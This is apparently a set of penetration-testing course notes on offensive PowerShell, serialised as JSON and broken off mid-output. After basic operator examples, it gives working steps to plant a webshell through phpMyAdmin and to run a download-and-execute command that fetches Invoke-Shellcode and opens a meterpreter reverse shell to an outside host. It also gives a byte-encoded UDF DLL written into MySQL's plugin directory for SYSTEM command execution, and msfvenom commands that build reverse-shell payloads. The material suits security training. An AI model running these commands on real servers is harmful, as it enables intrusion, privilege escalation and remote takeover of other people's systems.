C:\\Users\\Windows-32> 5 -gt 3\r\nTrue\r\nPS C:\\Users\\Windows-32> 5 -gt 7\r\nFalse\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> \"Hello PowerShell\" -match \"power\"\r\nTrue\r\nPS C:\\Users\\Windows-32> \"Hello PowerShell\" -match \"Power\"\r\nTrue\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> \"Hello PowerShell\" -replace \"Shell\"\r\nHello Power\r\nPS C:\\Users\\Windows-32> \"Hello PowerShell\" -replace \"shell\"\r\nHello Power\r\nPS C:\\Users\\Windows-32> \"Hello PowerShell\" -replace \"Shell\",\"Bell\"\r\nHello PowerBell\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator> \"lo\" -in \"lower\"\r\nFalse\r\nPS C:\\Users\\Administrator> \"lo\" -in \"lo\"\r\nTrue\r\nPS C:\\Users\\Administrator>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator> 1 -in 1,2,3\r\nTrue\r\nPS C:\\Users\\Administrator> 4 -in 1,2,3\r\nFalse\r\nPS C:\\Users\\Administrator>\r\n```\r\n\r\n- Redirection(```>, >>, 2> and 2>&1```)\r\n\r\nStream | Number\r\n---------|--------\r\nPipeline | 1> \r\nError | 2> \r\nWarning | 3>\r\nDebug | 4>\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> Get-Location\r\n\r\nPath\r\n----\r\nC:\\Users\\Windows-32\r\n\r\n\r\nPS C:\\Users\\Windows-32> Get-Location > loc.txt\r\nPS C:\\Users\\Windows-32> cat .\\loc.txt\r\n\r\nPath\r\n----\r\nC:\\Users\\Windows-32\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> cd ..\r\nPS C:\\Users> Get-Location >> .\\Windows-32\\loc.txt\r\nPS C:\\Users> Get-Content .\\Windows-32\\loc.txt\r\n\r\nPath\r\n----\r\nC:\\Users\\Windows-32\r\n\r\nPath\r\n----\r\nC:\\Users\r\nPS C:\\Users>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users> Get-Process none,explorer 2>&1\r\nGet-Process : Cannot find a process with the name \"none\". Verify the process name and call the cmdlet again.\r\nAt line:1 char:12\r\n+ Get-Process <<<< none,explorer 2>&1\r\n + CategoryInfo : ObjectNotFound: (none:String) [Get-Process], ProcessCommandException\r\n + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand\r\n\r\n\r\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\r\n------- ------ ----- ----- ----- ------ -- -----------\r\n 774 24 26976 22140 189 4.27 988 explorer\r\n\r\n\r\nPS C:\\Users>\r\n```\r\n\r\n###### Exercise\r\n\r\n- Explore the PowerShell help system and locate help topics for various operators\r\n" }, { "path": "50-PHPMyAdmin-Part-1.md", "content": "#### 50. PHPMyAdmin Part 1\n\n###### Exploitation – phpMyAdmin\n\n- Assumptions\n\n - Username / Password of phpMyAdmin is known\n - Writable directories on the web server are known\n\n- From phpMyAdmin access to SYSTEM privileges\n\n - Check OS\n \n ```\r SHOW VARIABLES LIKE \"%version%\";\n ```\n \r - Create webshell\n \n ```\r\tSELECT '' INTO OUTFILE 'C:\\\\inetpub\\\\wwwroot\\\\phpmyadmin\\\\config\\\\shell.php'\n\t```\n\t\n\t```\n\thttp://newpc/phpmyadmin/config/shell.php?e=whoami\n\t```\n\t\n\t- Get a meterpreter\n\n\t[```Invoke-ShellCode```](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1)\n\n\t```\n\thttp://newpc/phpmyadmin/config/shell.php?e=C:\\Windows\\Syswow64\\Windowspowershell\\v1.0\\powershell.exe -c iex((New-Object Net.WebClient).DownloadString('http://192.168.254.1/Invoke-ShellCode.ps1'));Invoke-ShellCode -Payload windows/meterpreter/reverse_https -LHOST 192.168.254.226 -LPORT 8443 -Force\n\t```\n\t\n###### Read\n\n- [Putting the MY in phpMyAdmin](https://pen-testing.sans.org/blog/pen-testing/2013/04/10/putting-the-my-in-phpmyadmin)" }, { "path": "51-PHPMyAdmin-Part-2.md", "content": "#### 51. PHPMyAdmin Part 2\n\n- Identify the ```plugin directory```\n\n```\nSELECT @@plugin_dir\n```\n\n- Convert the ```DLL``` to ```bytes```\n\n - [```UDF DLL from sqlmap```](https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql/windows)\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> . .\\Convert-Dll.ps1\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Get-Help Convert-Dll\n\nNAME\n Convert-Dll\n\nSYNOPSIS\n Nishang script to convert an executable to text file.\n\n\nSYNTAX\n Convert-Dll [-DllPath] [-OutputPath] []\n\n\nDESCRIPTION\n This script converts and an executable to a text file.\n\n\nRELATED LINKS\n http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html\n https://github.com/samratashok/nishang\n\nREMARKS\n To see the examples, type: \"get-help Convert-Dll -examples\".\n For more information, type: \"get-help Convert-Dll -detailed\".\n For technical information, type: \"get-help Convert-Dll -full\".\n For online help, type: \"get-help Convert-Dll -online\"\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Get-Help Convert-Dll -Examples\n\nNAME\n Convert-Dll\n\nSYNOPSIS\n Nishang script to convert an executable to text file.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n PS >ExetoText C:\\binaries\\evil.exe C:\\test\\evil.txt\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Convert-Dll -DllPath .\\lib_mysqludf_sys.dll_ -OutputPath dll.txt\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> ls .\\dll.txt\n\n\n Directory: C:\\Users\\Administrator\\Desktop\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\n-a--- 7/18/2017 4:43 PM 34184 dll.txt\n\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n- Write to the ```plugin directory``` of the ```server```\n\n```\nSELECT CHAR(77,90,144...) INTO OUTFILE 'C:\\\\Program Files\\\\MySQL\\\\MySQL Server 5.6\\\\lib\\\\plugin\\\\lib_mysqludf_ sys.dll' FIELDS ESCAPED BY ''\n```\n\n```\nSELECT CHAR(7,156,237,69,114,11,147,42,150,80,0,165,82,173,54,116,193,130,107,65,53,31,170,113,90,91,10,83,148,53,61,36,249,117,32,177,61,86,98,120,114,22,242,149,57,211,91,1,249,130,11,214,14,233,121,57,13,158,241\n,15,9,99,197,157,70,142,142,174,199,157,14,149,70,236,102,193,14,180,181,98,53,181,178,122,156,181,138,24,58,197,217,212,162,43,198,92,140,186,243,237,2,64,54,44,117,24,66,24,8,24,66,24,252,224,229,222,\n8,223,2,247,221,4,223,2,247,221,80,22,227,82,4,145,126,94,27,132,166,22,119,98,59,236,14,161,255,254,102,135,9,197,252,231,175,63,255,146,247,218,130,131,69,233,181,122,205,98,129,168,111,46,194,219,107\n,16,167,224,243,134,61,30,42,23,147,122,90,105,109,125,94,161,238,166,141,61,24,216,80,40,107,105,230,219,184,115,231,203,96,157,186,235,241,248,129,11,116,3,29,70,111,163,111,98,248,126,133,211,23,191,\n54,190,15,63,165,67,0,8,224,4,148,158,0,31,68,133,179,71,0,110,239,104,44,184,94,224,235,95,242,81,214,185,169,97,94,255,112,12,47,228,40,241,10,108,9,148,118,211,245,6,119,106,60,24,105,163,42,206,129,\n112,116,58,8,234,111,199,245,119,153,200,120,154,128,23,88,12,158,243,87,102,9,233,210,147,210,31,21,159,163,203,62,121,136,15,42,93,180,146,244,183,93,180,159,136,19,61,168,60,151,165,15,27,210,212,175\n,254,216,30,170,238,242,195,106,170,188,60,122,39,27,225,117,106,76,68,178,96,126,180,170,47,252,33,213,116,186,49,24,77,46,126,202,248,87,253,184,224,0,122,28,60,92,89,57,160,238,86,155,194,215,44,110,\n30,140,212,198,89,206,24,155,194,231,170,47,162,138,112,14,159,19,229,186,82,190,107,159,99,115,251,184,136,119,151,8,205,107,190,213,151,247,196,32,247,108,32,129,212,89,110,155,158,39,128,47,60,125,12\n6,246,12,138,185,13,126,253,102,60,82,128,254,148,161,90,128,65,204,47,126,208,120,102,37,17,1,206,244,92,63,219,221,118,151,2,191,174,207,209,211,72,196,96,31,234,206,136,254,219,118,209,8,12,209,216,2\n44,2,192,31,33,118,200,136,13,102,12,205,191,73,122,119,6,143,20,158,4,63,72,112,244,19,192,51,25,3,133,81,25,105,241,234,220,7,106,138,229,99,214,233,31,82,111,40,147,38,163,5,29,141,170,118,245,175,15\n5,47,223,193,213,135,245,150,242,245,202,30,189,58,19,189,20,63,253,161,172,199,181,46,140,159,126,44,215,37,101,240,155,93,206,211,172,16,205,56,55,194,92,226,238,158,216,106,93,150,19,50,160,132,103,2\n39,104,190,215,88,89,238,182,217,157,66,29,3,47,20,192,32,156,4,57,196,208,16,192,2,226,249,28,162,73,152,152,206,184,134,89,66,29,29,139,82,8,76,38,92,190,61,223,127,29,241,159,212,50,29,178,208,255,17\n7,166,137,184,187,202,193,237,234,9,70,210,9,10,139,113,238,187,238,89,56,218,8,221,205,142,140,239,186,36,99,204,8,251,10,93,222,29,179,147,10,66,2,220,22,234,37,144,158,195,164,183,25,164,16,157,144,2\n22,225,55,4,173,68,226,55,4,173,4,120,60,133,54,93,120,35,75,28,128,228,109,83,101,78,53,53,69,189,25,98,133,253,109,108,20,83,196,60,171,31,177,135,64,162,139,237,11,111,178,126,176,66,107,171,90,139,2\n37,26,168,122,115,216,56,115,55,212,150,51,37,193,209,147,213,161,254,138,159,86,104,14,124,119,96,43,12,75,20,146,172,106,239,80,239,155,228,48,78,161,218,83,155,217,198,173,121,237,239,123,28,65,104,2\n41,121,52,98,121,26,143,138,184,184,94,185,197,174,52,197,117,200,41,5,128,227,42,72,73,99,73,218,30,11,114,244,73,124,163,203,119,108,13,44,100,77,83,88,220,184,105,23,56,112,100,52,144,25,2,2,81,177,1\n55,168,134,42,36,149,184,80,173,94,137,207,130,11,3,101,39,15,65,69,80,98,156,143,204,203,123,231,48,230,26,130,12,223,188,51,15,254,7,33,89,71,255,1,222,59,15,238,153,8,201,224,204,248,28,173,133,134,1\n66,167,107,148,218,72,201,96,174,150,205,238,25,247,89,8,139,216,2,198,17,91,69,155,242,190,114,192,217,80,89,9,217,123,92,177,238,22,219,49,128,135,55,57,105,108,48,219,93,208,22,196,159,128,203,75,20,\n86,145,136,16,178,136,54,20,119,11,168,8,158,134,133,59,67,174,38,191,95,113,55,53,73,225,6,59,133,192,57,165,75,235,20,132,186,187,56,18,104,108,64,181,18,90,235,193,30,128,92,145,188,219,89,192,129,71\n,0,19,10,13,203,125,50,51,9,62,59,99,197,88,75,235,124,79,193,141,135,196,27,179,50,111,114,56,234,240,127,149,158,51,52,151,240,239,232,125,10,248,2,205,101,25,210,28,191,111,78,151,142,32,211,172,221,\n63,221,6,124,224,51,10,10,65,38,211,157,172,179,193,101,0,89,155,234,236,161,52,195,102,11,88,174,103,76,185,112,215,92,136,177,195,93,190,143,69,63,11,113,165,172,31,188,216,221,48,67,228,190,205,2,171\n,4,139,231,73,230,194,172,43,57,159,151,110,154,5,1,54,188,149,144,7,131,23,248,190,133,155,140,40,137,248,35,34,45,11,157,4,198,2,144,35,177,59,122,3,140,216,238,99,212,172,7,113,46,191,197,93,110,139,\n139,58,3,59,196,92,154,245,199,40,110,187,155,18,162,148,75,185,233,1,75,219,202,90,252,170,12,208,6,3,160,206,89,144,227,121,251,115,12,227,175,128,6,56,75,20,245,99,105,136,81,109,136,50,91,251,244,21\n9,66,108,69,147,248,55,34,118,179,198,111,98,84,191,87,128,73,137,248,140,136,235,82,154,26,79,20,164,189,221,67,0,104,189,96,196,234,194,72,175,57,87,41,91,246,246,37,218,207,247,21,37,51,255,199,65,17\n7,8,208,77,5,98,71,139,231,199,60,55,56,244,5,150,234,194,83,249,90,193,108,89,255,45,117,73,110,176,251,27,204,148,172,213,141,82,107,227,116,46,21,41,113,78,181,15,114,128,212,70,108,197,151,125,55,25\n3,126,65,168,170,75,40,138,103,125,181,106,67,220,30,110,108,68,53,164,196,41,129,59,179,155,158,17,167,214,136,48,54,7,180,250,114,243,238,85,208,127,155,101,62,215,234,126,243,253,116,137,65,111,50,24\n,108,166,106,63,146,58,19,35,27,167,169,170,74,8,204,93,41,247,169,12,113,165,115,59,231,248,19,178,220,184,23,254,42,233,44,106,31,232,251,28,70,238,223,146,163,128,50,4,161,96,191,160,40,205,135,95,22\n9,163,212,179,160,233,232,28,91,47,15,30,178,130,204,114,207,89,145,0,53,132,106,8,66,55,165,104,121,233,63,203,19,13,132,190,148,240,71,156,117,78,254,46,17,60,245,102,229,105,14,249,112,144,250,137,25\n,141,192,168,184,188,97,169,96,136,184,110,184,203,54,159,248,19,76,62,109,245,55,68,126,146,174,161,146,117,232,39,161,181,130,179,3,38,125,52,41,0,110,76,54,213,227,234,64,53,248,116,118,191,64,246,47\n,124,97,130,12,79,155,51,152,62,26,152,49,80,161,224,124,127,137,154,126,248,172,171,65,20,222,253,65,46,242,222,154,151,160,64,250,121,93,134,143,254,158,107,126,159,235,204,187,120,47,150,159,240,217,\n169,158,250,17,54,198,44,247,83,161,158,77,14,56,18,36,61,188,174,105,79,64,221,116,100,71,9,124,27,115,251,19,186,171,179,126,115,152,41,126,112,225,49,181,153,119,12,19,104,79,156,80,161,115,86,127,16\n9,5,108,225,154,189,132,42,15,213,24,28,249,93,156,140,4,50,76,136,94,203,20,19,127,212,122,192,3,106,95,169,0,76,210,122,139,101,14,255,243,5,37,98,63,97,208,193,136,25,37,247,82,7,137,161,169,140,98,1\n38,160,50,91,247,15,147,132,253,182,41,109,42,17,112,70,225,2,60,38,177,106,161,177,229,17,89,88,184,126,143,227,207,90,252,238,16,136,140,59,20,85,30,98,133,178,12,247,241,39,241,13,235,38,192,29,249,2\n06,147,63,97,2,133,249,50,74,197,64,215,199,156,144,41,215,150,176,212,151,171,114,227,145,123,156,213,221,88,213,102,109,65,140,223,128,221,54,42,254,167,166,165,201,230,34,54,59,125,135,112,122,192,10\n3,73,107,215,11,177,235,95,191,82,131,78,231,14,77,214,55,12,84,239,140,0,169,22,109,81,2,104,142,12,92,119,159,158,97,15,20,88,9,20,160,136,25,136,34,159,145,218,120,204,231,56,174,101,35,248,85,1,76,1\n26,137,43,157,116,69,65,6,90,211,209,146,25,52,235,69,150,124,41,18,177,118,124,166,243,139,200,139,95,87,219,151,201,85,204,129,91,177,184,183,244,50,189,28,100,240,122,252,150,136,64,126,16,196,51,169\n,151,115,59,227,126,3,130,33,180,153,116,146,35,143,163,248,207,154,57,231,52,79,191,251,204,97,59,183,191,30,78,137,174,223,39,201,188,210,53,216,65,118,228,183,214,147,36,163,217,182,149,148,39,173,86\n,72,201,211,160,87,23,126,170,95,213,82,61,73,172,162,118,117,109,189,55,134,236,123,12,110,172,35,51,154,65,34,196,89,192,122,93,145,205,175,131,205,199,95,206,70,152,69,116,101,142,149,137,7,151,141,8\n5,144,79,245,83,89,29,7,72,222,124,166,153,101,104,211,171,242,201,197,148,225,53,93,115,248,247,77,254,146,197,91,43,64,134,40,142,67,92,234,102,79,165,19,83,180,30,194,64,219,216,178,98,128,255,108,19\n9,92,154,245,179,153,111,52,166,214,58,252,150,50,173,120,106,200,90,240,135,153,212,124,40,206,93,97,7,104,69,241,101,120,79,62,144,78,190,197,244,224,114,195,192,243,27,86,154,240,32,153,54,175,85,162\n,83,201,143,54,154,159,56,245,192,153,174,42,161,49,82,67,12,74,153,6,11,89,44,126,252,0,62,139,50,135,69,56,179,1,119,180,177,4,113,229,109,249,255,113,135,24,80,15,191,55,185,96,205,15,227,194,88,87,2\n29,1,49,14,209,153,92,76,22,5,151,168,159,30,16,170,45,251,244,75,82,145,66,170,210,172,120,86,183,233,206,171,118,46,178,185,75,235,147,140,178,102,87,19,62,80,157,208,199,235,26,13,72,173,129,39,108,9\n4,47,4,206,143,23,56,216,122,74,46,108,139,201,45,195,83,226,162,154,80,94,67,198,160,222,73,144,240,213,20,195,29,188,80,40,172,1,56,249,87,187,194,205,158,8,210,53,231,189,254,106,230,50,186,207,14,23\n9,161,198,36,160,242,37,158,171,101,156,47,190,249,196,149,47,151,71,4,186,151,147,175,113,29,122,207,48,215,147,209,155,52,204,112,244,252,177,16,55,242,185,40,214,68,120,90,3,35,77,244,186,205,207,185\n,25,214,155,159,20,205,38,155,148,47,54,66,99,210,6,248,230,125,169,250,184,146,143,221,185,134,151,165,234,30,197,236,214,5,197,7,16,6,2,245,171,202,4,27,122,220,155,165,126,241,137,132,4,165,27,30,219\n,4,101,188,57,115,166,17,120,120,129,238,26,141,215,246,73,224,30,61,217,60,35,121,91,76,9,217,5,44,243,207,112,199,48,233,198,244,233,235,34,36,91,204,128,189,36,43,51,64,32,87,89,159,80,210,207,142,10\n2,91,190,207,148,147,131,117,42,53,205,60,76,55,168,62,106,2,2,14,69,24,25,252,32,194,203,24,211,201,122,132,236,183,62,18,252,146,227,231,239,83,6,248,37,45,107,63,178,104,207,112,195,214,246,195,240,2\n16,9,45,170,217,74,235,170,29,33,107,20,214,254,93,45,179,141,75,71,48,21,214,158,83,252,133,93,41,216,42,165,118,120,138,200,185,223,29,171,146,156,88,197,131,101,2,128,178,15,59,67,232,228,203,54,213,\n239,55,230,186,110,86,46,186,158,188,187,157,64,126,152,180,95,157,225,217,105,21,139,65,83,93,73,158,161,159,96,211,207,14,250,6,142,1,121,233,231,18,58,164,3,28,231,164,97,60,193,253,150,132,120,221,2\n41,247,80,184,64,60,57,118,96,44,24,184,177,84,183,209,215,27,67,64,93,102,142,137,190,92,210,194,28,114,190,190,181,7,89,43,216,181,105,83,230,138,134,10,185,159,185,114,25,181,192,252,20,183,94,1,21,3\n5,220,88,102,142,55,206,40,31,24,23,39,143,113,1,121,38,142,248,185,110,187,225,87,193,192,177,43,125,172,202,242,176,182,232,11,110,84,91,34,155,152,159,64,91,165,30,162,110,21,6,98,206,50,75,218,45,14\n1,144,84,137,188,36,88,104,19,102,254,126,44,163,192,77,74,227,202,115,176,131,9,225,210,211,179,215,211,70,120,187,171,224,214,237,78,64,208,139,225,96,28,255,223,255,138,225,155,231,20,252,140,32,199,\n31,206,8,103,156,197,161,157,195,254,85,121,159,225,240,110,113,8,14,216,193,30,76,135,84,71,35,204,30,78,135,159,33,207,224,119,135,253,99,238,231,240,86,113,223,170,154,172,32,126,167,207,225,240,12,1\n74,40,98,239,223,194,225,66,99,238,225,240,62,113,96,225,240,60,65,239,18,113,135,70,3,153,195,253,99,254,124,135,4,70,220,195,225,66,99,170,99,222,206,225,41,113,36,71,35,207,161,131,175,251,233,58,246\n,35,238,14,205,226,223,76,32,244,216,34,140,65,204,225,250,176,224,42,182,197,69,229,144,101,106,188,193,31,248,81,217,80,148,199,252,237,84,132,31,160,205,211,217,106,189,76,119,66,48,180,84,234,118,13\n2,218,195,40,12,70,104,112,117,219,26,90,101,119,135,123,4,133,189,194,118,16,246,68,93,178,48,122,38,242,113,175,48,114,9,118,225,144,83,59,42,90,111,218,89,168,34,110,38,136,7,106,16,167,172,202,117,1\n47,72,133,32,189,84,52,179,172,241,19,102,237,30,58,119,129,148,83,30,181,225,39,208,80,144,223,118,136,78,65,175,85,116,157,13,24,39,233,130,74,148,175,224,72,34,22,126,85,237,159,142,53,213,3,43,218,1\n56,135,53,84,12,46,169,28,246,248,149,167,172,195,179,173,185,200,117,11,171,64,112,38,129,17,221,47,212,12,186,148,189,31,3,116,33,53,242,224,106,10,231,3,121,104,63,223,115,15,255,3,81,215,156,131,204\n,254,22,200,35,118,208,78,66,162,84,208,163,125,34,110,210,229,232,46,142,60,223,43,196,160,157,200,92,251,29,152,139,47,127,218,95,159,159,24,212,94,227,21,132,210,227,112,126,3,122,218,248,3,121,10,3,\n35,151,16,59,249,160,36,190,92,88,13,241,156,211,164,9,177,77,156,61,170,44,65,232,148,139,204,100,166,56,224,117,59,167,224,113,72,60,149,26,172,123,100,111,195,36,161,141,195,158,81,200,213,163,220,20\n2,251,166,210,154,239,159,75,16,9,217,75,27,209,253,111,229,157,154,73,19,234,78,59,244,36,129,96,244,91,32,142,79,253,13,168,1,186,26,57,180,51,205,161,9,12,64,216,8,41,25,197,79,137,2,7,4,107,174,155,\n160,66,126,180,56,237,151,223,191,16,242,112,215,227,80,148,0,69,140,155,189,126,245,198,176,178,110,49,26,47,190,169,237,9,71,166,168,213,216,109,47,212,152,72,232,113,210,32,44,1,16,216,87,171,245,161\n,237,126,90,99,93,120,186,197,171,123,188,18,62,217,141,97,56,181,138,115,167,180,185,124,128,96,161,10,245,100,214,215,52,49,56,133,64,103,59,232,22,28,187,93,203,119,253,135,222,108,241,122,195,46,102\n,2,31,236,244,77,153,28,63,116,56,228,111,188,185,155,95,126,169,13,88,61,215,154,95,66,132,3,145,81,244,108,28,251,73,102,109,56,142,118,228,210,118,80,103,129,95,135,182,195,203,238,198,150,218,114,20\n3,237,11,137,235,10,97,70,228,116,251,26,111,105,119,145,115,178,33,239,30,52,7,3,138,138,142,234,95,237,122,43,103,232,59,255,69,129,4,27,43,149,158,233,247,132,29,95,22,137,206,227,151,88,54,5,112,6,1\n88,157,209,18,97,6,56,63,58,232,187,200,227,169,245,59,94,141,122,218,124,65,48,135,72,228,112,146,236,8,116,161,56,93,173,190,136,5,28,95,55,230,197,129,125,20,131,184,182,216,182,18,178,226,233,119,13\n5,239,63,0,60,168,62,217,100,242,144,220,56,147,177,135,91,64,146,151,30,41,200,116,254,5,194,224,137,133,63,245,68,208,17,224,121,251,95,235,146,197,20,244,97,53,66,173,247,15,202,93,227,198,160,83,56,\n208,77,28,76,152,108,119,193,105,75,86,30,159,99,133,35,251,116,221,101,38,173,141,86,117,236,43,154,184,218,184,86,196,43,246,215,239,240,201,110,106,13,66,40,104,205,73,194,238,33,9,248,42,2,60,180,14\n2,36,210,164,200,46,111,138,97,77,19,47,131,67,59,73,133,238,117,132,31,231,247,109,154,123,150,198,93,72,198,61,65,93,161,65,164,146,196,157,95,92,181,222,136,101,44,228,218,15,136,254,210,71,132,234,1\n25,46,109,61,83,15,164,63,155,226,42,186,21,30,227,162,23,189,225,230,152,172,11,74,201,117,35,111,157,222,144,112,25,197,232,142,180,235,193,178,230,128,239,113,53,128,83,144,26,86,108,212,127,154,252,\n13,170,253,63,190,137,204,221,55,124,173,70,208,86,187,163,31,159,51,79,75,17,132,84,134,123,98,0,210,191,122,191,189,156,229,218,29,222,202,161,96,129,9,111,218,41,116,228,91,200,193,228,139,35,151,149\n,225,130,149,229,32,130,72,126,236,201,194,133,93,134,239,120,254,30,111,182,96,218,49,160,2,125,178,166,173,63,200,121,18,106,180,10,208,17,131,105,134,182,124,218,97,23,112,61,251,102,180,24,161,253,1\n05,218,239,160,189,113,237,34,23,163,208,81,172,95,218,234,224,97,76,95,92,77,161,99,75,114,229,162,67,148,143,166,163,125,43,136,174,63,25,47,179,23,202,157,48,112,208,90,171,132,52,44,94,160,201,249,1\n85,204,95,98,93,189,182,63,55,222,113,209,156,133,167,24,25,147,77,132,115,243,197,156,104,177,237,144,2,102,27,109,100,233,24,5,144,91,210,79,155,137,11,76,157,168,156,129,217,67,209,75,207,32,241,147,\n1,165,0,237,41,225,7,251,235,37,230,249,255,214,235,155,231,80,243,144,67,165,63,251,9,90,203,48,48,60,158,109,85,38,190,69,125,18,135,147,229,175,245,144,211,53,156,83,199,141,204,31,244,236,101,77,187\n,198,91,240,58,23,16,68,102,3,98,218,144,147,193,171,95,88,190,224,27,70,244,114,23,48,108,70,127,207,62,187,207,54,223,131,208,92,208,170,63,230,163,127,255,43,125,20,69,111,93,191,4,83,131,250,252,18,\n120,251,219,156,68,231,79,2,43,128,80,33,122,185,101,240,94,128,8,60,114,33,229,27,240,56,12,153,158,228,72,198,161,185,204,81,125,141,165,115,223,116,240,103,180,41,224,102,120,71,28,97,227,159,118,15,\n127,218,49,192,64,122,184,6,65,211,135,212,196,177,249,140,135,188,72,67,113,205,238,27,239,115,131,99,88,240,66,142,147,37,191,55,31,248,215,253,30,0,250,163,60,224,25,210,9,33,51,88,239,51,246,52,208,\n243,200,104,243,128,181,17,133,121,51,167,249,223,111,173,244,57,163,13,24,100,188,103,238,232,115,134,162,74,26,78,90,180,93,234,235,144,68,189,209,90,157,126,159,109,142,134,219,213,90,190,15,231,117,\n16,180,179,29,251,178,77,126,17,254,63,187,99,42,36,216,155,22,50,217,178,117,4,217,114,133,249,130,176,45,42,29,46,181,126,17,157,175,87,205,201,230,193,204,168,236,139,86,126,181,139,247,129,162,200,8\n,198,31,106,217,223,164,123,182,60,54,176,50,142,25,121,179,135,235,225,154,137,145,170,57,146,183,203,62,94,55,65,20,202,188,209,134,208,246,240,98,178,45,89,196,125,17,96,169,74,21,202,218,189,193,168\n,35,9,195,202,165,151,153,67,177,248,210,203,175,190,13,233,91,34,40,81,205,103,205,250,1,102,138,24,64,148,176,22,36,77,107,213,205,2,66,177,49,218,251,114,27,103,59,210,247,239,154,77,168,220,156,142,\n77,250,113,33,44,214,152,246,36,58,52,82,43,215,181,100,154,203,210,223,117,212,148,82,175,176,40,71,150,217,98,142,138,170,77,242,104,2,196,208,176,226,41,3,98,126,106,222,103,160,178,124,32,11,250,191\n,44,118,163,177,182,31,192,183,49,238,21,121,191,144,18,20,247,42,181,70,219,150,4,151,201,203,170,27,24,100,14,204,197,250,27,19,190,180,114,108,11,21,237,196,252,100,154,220,10,10,114,235,215,180,182,\n13,228,155,254,255,172,48,113,74,249,243,191,66,143,66,250,216,44,143,253,223,231,153,16,158,175,215,243,32,243,10,36,117) INTO OUTFILE 'C:\\\\Program Files\\\\MySQL\\\\MySQL Server 5.6\\\\lib\\\\plugin\\\\lib_mysqludf_ sys.dll' FIELDS ESCAPED BY ''\n```\n\n- Create a ```function```\n\n```\nCREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll'\n```\n\n- Execute commands as ```SYSTEM```\n\n```\nSelect sys_eval('whoami')\n```\n\n###### Reads\n\n- [Putting the MY in phpMyAdmin](https://pen-testing.sans.org/blog/pen-testing/2013/04/10/putting-the-my-in-phpmyadmin)\n- [Script Execution and Privilege Escalation on Jenkins Server](http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html)" }, { "path": "52-Metasploit-Part-1.md", "content": "#### 52. Metasploit Part 1\n\n- PowerShell payload formats\n\n\t- psh\n\t- psh-cmd\n\t- psh-net\n\t- psh-reflection\n\n```sh\nroot@kali:~# msfvenom --help-formats psh\nExecutable formats\n\tasp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war\nTransform formats\n\tbash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript\nroot@kali:~#\n```\n\n- Generating PowerShell payloads\n\n - ```Script```\n\n\t```sh\n\troot@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.206 -f psh > ps_payload64.ps1\n\tNo platform was selected, choosing Msf::Module::Platform::Windows from the payload\n\tNo Arch selected, selecting Arch: x64 from the payload\n\tNo encoder or badchars specified, outputting raw payload\n\tPayload size: 743 bytes\n\tFinal size of psh file: 4380 bytes\n\troot@kali:~#\n\t```\n\t\n\t```sh\n\troot@kali:~# file ps_payload64.ps1\n\tps_payload64.ps1: ASCII text, with very long lines, with CRLF line terminators\n\troot@kali:~#\n\t```\n\t\n\t- ```Shellcode```\n\n\t```sh\n\troot@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.206 -f powershell > ps_shellcode\n\tNo platform was selected, choosing Msf::Module::Platform::Windows from the payload\n\tNo Arch selected, selecting Arch: x64 from the payload\n\tNo encoder or badchars specified, outputting raw payload\n\tPayload size: 668 bytes\n\tFinal size of powershell file: 3265 bytes\n\troot@kali:~#\n\t```\n\t\n\t```sh\n\troot@kali:~# file ps_shellcode\n\tps_shellcode: ASCII text, with very long lines, with CRLF line terminators\n\troot@kali:~#\n\t```\n\t\n\t- ```psh-reflection```\n\t - Very useful\n\t - Compilation happens in memory\n\t - No need of execute privileges on temp directory \n\t - Use this often\n\n\t```sh\n\troot@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.206 -f psh-reflection > ps_payload64.ps1\n\tNo platform was selected, choosing Msf::Module::Platform::Windows from the payload\n\tNo Arch selected, selecting Arch: x64 from the payload\n\tNo encoder or badchars specified, outputting raw payload\n\tPayload size: 687 bytes\n\tFinal size of psh-reflection file: 3118 bytes\n\t\n\troot@kali:~#\n\t```\n\t\n\t```sh\n\troot@kali:~# file ps_payload64.ps1\n\tps_payload64.ps1: ASCII text, with very long lines, with CRLF line terminators\n\troot@kali:~#\n\t```\n\t\n\t- ```windows/reverse/reverse_powershell```\n\n\t```sh\n\troot@kali:~# msfvenom -p cmd/windows/reverse_powershell LHOST=10.0.0.206 > ps_payload.ps1\n\tNo platform was selected, choosing Msf::Module::Platform::Windows from the payload\n\tNo Arch selected, selecting Arch: cmd from the payload\n\tNo encoder or badchars specified, outputting raw payload\n\tPayload size: 1223 